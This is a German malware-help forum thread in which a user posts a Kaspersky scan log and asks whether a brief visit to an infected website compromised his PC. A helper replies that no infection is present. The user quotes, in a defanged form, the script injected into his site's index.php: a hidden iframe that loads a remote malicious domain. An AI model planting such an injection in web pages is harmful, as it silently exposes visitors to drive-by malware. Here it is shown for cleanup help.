Trojaner-Board

Trojaner-Board (https://www.trojaner-board.de/)
-   Log-Analyse und Auswertung (https://www.trojaner-board.de/log-analyse-auswertung/)
-   -   webseite mit trojaner - nach 10 sek. internet gekappt, infizierung möglich? (https://www.trojaner-board.de/129269-webseite-trojaner-10-sek-internet-gekappt-infizierung-moeglich.html)

harry1973 10.01.2013 03:22
webseite mit trojaner - nach 10 sek. internet gekappt, infizierung möglich?
 
hallo,

ich bin eine vollmeise. ich habe für 5 min den kaspersky deaktiviert um eine infizierte webseite bzw. eine datei davon herunterladen zu können und diese dann im editor zu bereinigen. leider habe ich übersehen dass da noch eine weitere infizierte datei ist und hab zudem vergessen kasperksy wieder zu aktivieren und hab dann blöderweise die webseite aufgerufen. beim laden der seite habe ich dann gechekt, dass kasperky nicht aktiv ist und hab sofort das internet abgehängt.

hab dann kaspersky laufen lassen und er hat im firefox cache 4 dateien mit HEUR:Trojan.Script.Generic sowie 2 dateien mit der endung .dll im programmordner von adobe bridge gefunden.

kann es sein, dass in den 10 sekunden wo ich die seite geladen habe, bereits eine infektion statt gefunden hat und dass in dieser kurzen zeit auch schon daten von meinem computer übertragen wurden? ich hatte vor einiger zeit schon mal das problem, wo daten von meinem computer übertragen wurden.

danke für eure hilfe!

lg
harry

ryder 10.01.2013 13:05
Und wie die Dateien genau heissen dürfen wir uns ausdenken?

Bitte Logfiles dazu anzeigen:

So funktioniert es:
Posten in CODE-Tags
Die Logfiles anzuhängen oder sogar vorher in ein ZIP, RAR, 7Z-Archive zu packen erschwert mir massiv die Arbeit, es sei denn natürlich die Datei wäre ansonsten zu gross für das Forum. Um die Logfiles in eine CODE-Box zu stellen gehe so vor:
  • Markiere das gesamte Logfile (geht meist mit STRG+A) und kopiere es in die Zwischenablage mit STRG+C.
  • Klicke im Editor auf das #-Symbol. Es erscheinen zwei Klammerausdrücke [CODE] [/CODE].
  • Setze den Curser zwischen die CODE-Tags und drücke STRG+V.
  • Klicke auf Erweitert/Vorschau, um so prüfen, ob du es richtig gemacht hast. Wenn alles stimmt ... auf Antworten.
http://www.trojaner-board.de/picture...&pictureid=307

ryder 12.01.2013 10:10
Fehlende Rückmeldung
Dieses Thema wurde aus den Abos gelöscht. Somit bekomm ich keine Benachrichtigung über neue Antworten.
PM an mich falls Du denoch weiter machen willst.

Hinweis: Das Verschwinden der Symptome bedeutet nicht, dass Dein Rechner schon sauber ist.

Jeder andere bitte hier klicken und einen eigenen Thread erstellen

harry1973 12.01.2013 13:35
hallo,

hier das logfile:
Code:
Rootkit Scan: completed 29 days ago  (events: 2, objects: 2323, time: 00:14:34)       
14.12.2012 09:59:31        Task completed                               
14.12.2012 09:44:57        Task started                               
Rootkit Scan: completed 27 days ago  (events: 2, objects: 2453, time: 00:30:07)       
15.12.2012 15:16:47        Task completed                               
15.12.2012 14:46:34        Task started                               
Rootkit Scan: completed 27 days ago  (events: 2, objects: 524, time: 00:07:47)       
16.12.2012 10:16:39        Task completed                               
16.12.2012 10:08:47        Task started                               
Rootkit Scan: completed 25 days ago  (events: 2, objects: 2616, time: 00:15:25)       
17.12.2012 18:51:56        Task completed                               
17.12.2012 18:36:27        Task started                               
Rootkit Scan: completed 24 days ago  (events: 2, objects: 51, time: 00:09:11)       
18.12.2012 18:15:29        Task completed                               
18.12.2012 18:06:11        Task started                               
Rootkit Scan: completed 23 days ago  (events: 2, objects: 2334, time: 00:16:05)       
19.12.2012 18:53:35        Task completed                               
19.12.2012 18:37:30        Task started                               
Rootkit Scan: completed 22 days ago  (events: 2, objects: 2572, time: 00:16:50)       
20.12.2012 18:54:32        Task completed                               
20.12.2012 18:37:41        Task started                               
Rootkit Scan: completed 22 days ago  (events: 2, objects: 2275, time: 00:16:14)       
21.12.2012 06:56:42        Task completed                               
21.12.2012 06:40:28        Task started                               
Rootkit Scan: completed 20 days ago  (events: 2, objects: 2240, time: 00:14:30)       
23.12.2012 10:22:22        Task completed                               
23.12.2012 10:07:52        Task started                               
Rootkit Scan: completed 19 days ago  (events: 2, objects: 2427, time: 00:13:17)       
24.12.2012 10:21:02        Task completed                               
24.12.2012 10:07:45        Task started                               
Rootkit Scan: malfunction    (events: 1, objects: 0, time: Unknown)       
24.12.2012 14:56:28        Task started                               
Rootkit Scan: completed 17 days ago  (events: 2, objects: 2416, time: 00:13:13)       
25.12.2012 14:47:40        Task completed                               
25.12.2012 14:34:27        Task started                               
Rootkit Scan: completed 16 days ago  (events: 2, objects: 2120, time: 00:11:14)       
26.12.2012 11:18:45        Task completed                               
26.12.2012 11:07:31        Task started                               
Rootkit Scan: completed 16 days ago  (events: 2, objects: 2233, time: 00:13:20)       
27.12.2012 08:09:44        Task completed                               
27.12.2012 07:56:24        Task started                               
Rootkit Scan: completed 12 days ago  (events: 2, objects: 2175, time: 00:11:34)       
30.12.2012 12:42:48        Task completed                               
30.12.2012 12:31:14        Task started                               
Rootkit Scan: completed 11 days ago  (events: 2, objects: 2175, time: 00:11:46)       
31.12.2012 11:03:32        Task completed                               
31.12.2012 10:51:46        Task started                               
Rootkit Scan: completed 10 days ago  (events: 2, objects: 2234, time: 00:12:54)       
01.01.2013 12:23:54        Task completed                               
01.01.2013 12:11:00        Task started                               
Rootkit Scan: completed 9 days ago  (events: 2, objects: 2574, time: 00:14:52)       
02.01.2013 12:25:53        Task completed                               
02.01.2013 12:11:00        Task started                               
Rootkit Scan: completed 8 days ago  (events: 2, objects: 2250, time: 00:12:52)       
04.01.2013 09:25:57        Task completed                               
04.01.2013 09:13:05        Task started                               
Rootkit Scan: completed 6 days ago  (events: 2, objects: 320, time: 00:02:41)       
05.01.2013 16:00:21        Task completed                               
05.01.2013 15:57:37        Task started                               
Rootkit Scan: completed 5 days ago  (events: 2, objects: 2366, time: 00:13:49)       
06.01.2013 10:49:25        Task completed                               
06.01.2013 10:35:35        Task started                               
Rootkit Scan: completed 4 days ago  (events: 2, objects: 2322, time: 00:17:43)       
07.01.2013 19:14:20        Task completed                               
07.01.2013 18:56:37        Task started                               
Full Scan: completed 2 days ago  (events: 29, objects: 2229281, time: 05:05:55)       
09.01.2013 08:10:43        Task started                               
09.01.2013 08:15:16        Task stopped                               
09.01.2013 08:15:20        Task started                               
09.01.2013 08:26:57        Task stopped                               
09.01.2013 08:26:59        Task started                               
09.01.2013 08:58:27        Task stopped                               
09.01.2013 08:58:31        Task started                               
09.01.2013 08:59:54        Detected: HEUR:Trojan.Script.Generic        C:\Dokumente und Einstellungen\Martin\Lokale Einstellungen\Anwendungsdaten\Mozilla\Firefox\Profiles\5xid4jwa.default\Cache\2\48\C2D47d01                       
09.01.2013 09:00:24        Detected: HEUR:Trojan.Script.Generic        C:\Dokumente und Einstellungen\Martin\Lokale Einstellungen\Anwendungsdaten\Mozilla\Firefox\Profiles\5xid4jwa.default\Cache\2\DF\188E6d01                       
09.01.2013 09:03:09        Detected: HEUR:Trojan.Script.Generic        C:\Dokumente und Einstellungen\Martin\Lokale Einstellungen\Anwendungsdaten\Mozilla\Firefox\Profiles\5xid4jwa.default\Cache\9\AC\51A8Cd01                       
09.01.2013 09:04:04        Detected: HEUR:Trojan.Script.Generic        C:\Dokumente und Einstellungen\Martin\Lokale Einstellungen\Anwendungsdaten\Mozilla\Firefox\Profiles\5xid4jwa.default\Cache\C\5E\0C1C7d01                       
09.01.2013 09:04:27        Detected: HEUR:Trojan.Script.Generic        C:\Dokumente und Einstellungen\Martin\Lokale Einstellungen\Anwendungsdaten\Mozilla\Firefox\Profiles\5xid4jwa.default\Cache\C\B9\465B2d01                       
09.01.2013 09:11:10        Detected: Packed.Win32.Klone.bq        C:\Programme\Adobe\Adobe Bridge\browser\zip.dll                       
09.01.2013 09:11:19        Deleted: Packed.Win32.Klone.bq        C:\Programme\Adobe\Adobe Bridge\browser\zip.dll                       
09.01.2013 09:44:02        Task stopped                               
09.01.2013 09:44:05        Task started                               
09.01.2013 10:20:18        Task stopped                               
09.01.2013 10:20:20        Task started                               
09.01.2013 10:51:56        Task stopped                               
09.01.2013 10:51:58        Task started                               
09.01.2013 11:11:43        Task stopped                               
09.01.2013 11:11:45        Task started                               
09.01.2013 11:57:03        Processing error        D:\##_E-Mails_##\Outlook.pst        Read error               
09.01.2013 12:02:24        Task stopped                               
09.01.2013 12:04:57        Task started                                                       
09.01.2013 17:10:52        Task completed                               
Rootkit Scan: completed 2 days ago  (events: 2, objects: 2350, time: 00:12:43)       
09.01.2013 17:24:37        Task completed                               
09.01.2013 17:11:54        Task started
und hier der code der in der index.php sowie den javascripts war:

Code:
<s c r i p t>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="hxxx://g c l a b r e l s c o n . n e t / a b o u t . p h p"></iframe></div>');</ s c r i p t>

ryder 12.01.2013 16:48
Da ist keine Infektion.

Zur Kontrolle:

Quick-Scan mit Malwarebytes

Downloade Dir bitte Malwarebytes
  • Installiere das Programm in den vorgegebenen Pfad.
    Vista und Win7 User mit Rechtsklick "als Administrator starten"
  • Starte Malwarebytes, klicke auf Aktualisierung --> Suche nach Aktualisierung
  • Wenn das Update beendet wurde, aktiviere Quickscan durchführen und drücke auf Scannen.
  • Wenn der Scan beendet ist, klicke auf Ergebnisse anzeigen.
  • Versichere Dich, dass alle Funde markiert sind und drücke Entferne Auswahl.
  • Poste das Logfile, welches sich in Notepad öffnet, hier in den Thread.
  • Nachträglich kannst du den Bericht unter "Log Dateien" finden.

harry1973 12.01.2013 16:54
super! danke für die hilfe! malwarebytes habe ich zusätzlich installiert und war auch aktiv.

lg
harry

ryder 12.01.2013 16:57
Du liest aber schon was ich schreibe oder?
Du möchtest bitte einen aktuellen Scan machen!

harry1973 12.01.2013 16:59
jup, scan läuft schon sein einigen stunden.
lg
harry

ryder 12.01.2013 17:00
Da steht eindeutig was von Quickscan.

ryder 15.01.2013 14:03
Das Thema ist endgültig beendet.


Alle Zeitangaben in WEZ +1. Es ist jetzt 03:53 Uhr.

Copyright ©2000-2025, Trojaner-Board


Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131